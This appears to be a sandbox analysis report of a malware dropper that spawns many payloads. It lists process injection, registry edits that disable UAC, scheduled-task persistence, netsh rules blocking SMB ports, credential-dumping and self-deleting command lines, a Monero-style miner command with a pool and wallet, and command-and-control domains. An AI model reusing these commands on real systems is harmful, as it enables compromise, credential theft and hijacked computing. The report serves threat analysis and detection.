Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\TXPlatforn.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\mediaget.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4068 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 4068 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\Pluto Panel.exe
PID 4068 wrote to memory of 4208 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
PID 4068 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\22.exe
PID 1820 wrote to memory of 2780 N/A C:\Users\Admin\AppData\Roaming\22.exe C:\Windows\SysWOW64\netsh.exe
PID 4068 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe C:\Users\Admin\AppData\Roaming\___11.19.exe
PID 1168 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 3636 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\test.exe
PID 3636 wrote to memory of 400 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\gay.exe
PID 3636 wrote to memory of 3032 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\Opus.exe
PID 3636 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\aaa.exe
PID 3636 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
PID 3636 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3636 wrote to memory of 4812 N/A C:\Users\Admin\AppData\Roaming\healastounding.exe C:\Users\Admin\AppData\Roaming\a.exe
PID 2336 wrote to memory of 4420 N/A C:\Users\Admin\AppData\Local\Temp\svchost.exe C:\Windows\SysWOW64\cmd.exe
PID 1168 wrote to memory of 692 N/A C:\Users\Admin\AppData\Roaming\___11.19.exe C:\Users\Admin\AppData\Local\Temp\svchos.exe
PID 4208 wrote to memory of 5052 N/A C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Users\Admin\AppData\Roaming\3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\Resources\Ease of Access Themes\schtasks.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe

"C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe"

C:\Users\Admin\AppData\Roaming\healastounding.exe

"C:\Users\Admin\AppData\Roaming\healastounding.exe"

C:\Users\Admin\AppData\Roaming\Pluto Panel.exe

"C:\Users\Admin\AppData\Roaming\Pluto Panel.exe"

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Users\Admin\AppData\Roaming\22.exe

"C:\Users\Admin\AppData\Roaming\22.exe"

C:\Users\Admin\AppData\Roaming\___11.19.exe

"C:\Users\Admin\AppData\Roaming\___11.19.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add policy name=Block

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\\svchost.exe

C:\Users\Admin\AppData\Roaming\test.exe

"C:\Users\Admin\AppData\Roaming\test.exe"

C:\Users\Admin\AppData\Roaming\gay.exe

"C:\Users\Admin\AppData\Roaming\gay.exe"

C:\Users\Admin\AppData\Roaming\Opus.exe

"C:\Users\Admin\AppData\Roaming\Opus.exe"

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Users\Admin\AppData\Roaming\4.exe

"C:\Users\Admin\AppData\Roaming\4.exe"

C:\Users\Admin\AppData\Roaming\a.exe

"C:\Users\Admin\AppData\Roaming\a.exe"

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul

C:\Users\Admin\AppData\Local\Temp\svchos.exe

C:\Users\Admin\AppData\Local\Temp\\svchos.exe

C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe

"C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -acsi

C:\Windows\SysWOW64\svchost.exe

C:\Windows\SysWOW64\svchost.exe -k "Ö÷¶¯·ÀÓù·þÎñÄ£¿é"

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor" /xml "C:\Users\Admin\AppData\Local\Temp\tmpCCD5.tmp"

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Users\Admin\AppData\Roaming\HD____11.19.exe

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filterlist name=Filter1

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /f /tn "SCSI Monitor Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp"

C:\Users\Admin\AppData\Roaming\mediaget.exe

"C:\Users\Admin\AppData\Roaming\mediaget.exe"

C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe

C:\Windows\system32\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe "c:\windows\system32\240629765.txt",MainThread

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\fr-FR\SearchApp.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Windows\Resources\Ease of Access Themes\schtasks.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default User\winlogon.exe'" /rl HIGHEST /f

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\mediaget.exe" "mediaget.exe" ENABLE

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP

C:\Windows\Resources\Ease of Access Themes\schtasks.exe

"C:\Windows\Resources\Ease of Access Themes\schtasks.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP

C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe

"C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\aaa.exe

"C:\Users\Admin\AppData\Roaming\aaa.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP

C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe

"C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add filteraction name=FilteraAtion1 action=block

C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe

"C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"

C:\Windows\SysWOW64\netsh.exe

netsh ipsec static set policy name=Block assign=y

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 4848 -ip 4848

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 1340

C:\Windows\SysWOW64\PING.EXE

ping -n 2 127.0.0.1

C:\Windows\Help\Winlogon.exe

C:\Windows\Help\Winlogon.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c del "C:\Users\Admin\AppData\Roaming\22.exe"

C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\Cursors\WUDFhosts.exe

C:\Windows\Cursors\WUDFhosts.exe -o pool.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S -p x

C:\Windows\SysWOW64\svchost.exe

C:\Windows\system32\svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1372 -ip 1372

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 448

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\\svchost.exe

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -auto

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\AppData\Local\Temp\svchost.exe > nul

C:\Users\Admin\AppData\Local\Temp\svchos.exe

C:\Users\Admin\AppData\Local\Temp\\svchos.exe

C:\Windows\SysWOW64\TXPlatforn.exe

C:\Windows\SysWOW64\TXPlatforn.exe -acsi

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff9757c46f8,0x7ff9757c4708,0x7ff9757c4718

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:1

C:\Windows\SysWOW64\PING.EXE

ping -n 2 127.0.0.1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3648 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1700 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=renderer --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6200 /prefetch:8

C:\Users\Admin\Downloads\HitmanPro_x64.exe

"C:\Users\Admin\Downloads\HitmanPro_x64.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4768 /prefetch:2

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3780 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\HD_msedge.exe" --type=gpu-process --field-trial-handle=2056,17449007700291390702,18394526988265309972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2344 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 api.ipify.org udp
US 8.8.8.8:53 whatismyipaddress.com udp
US 104.19.222.79:80 whatismyipaddress.com tcp
US 104.26.12.205:80 api.ipify.org tcp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 104.19.222.79:443 whatismyipaddress.com tcp
RU 80.87.192.115:80 tcp
US 8.8.8.8:53 yabynennet.xyz udp
US 104.155.138.21:81 yabynennet.xyz tcp
US 8.8.8.8:53 79.222.19.104.in-addr.arpa udp
US 8.8.8.8:53 205.12.26.104.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 21.138.155.104.in-addr.arpa udp
CN 59.56.110.231:8898 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 gfhhjgh.duckdns.org udp
CO 179.13.1.253:8050 gfhhjgh.duckdns.org tcp
CA 172.98.92.42:58491 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
RU 92.63.107.12:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
RU 92.63.107.12:80 tcp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
MD 194.180.174.53:80 tcp
US 8.8.8.8:53 kazya1.hopto.org udp
US 8.8.8.8:53 pretorian.ac.ug udp
US 8.8.8.8:53 pretorian.ac.ug udp
US 8.8.8.8:53 prepepe.ac.ug udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 hackerinvasion.f3322.net udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 22ssh.com udp
US 8.8.8.8:53 pool.usa-138.com udp
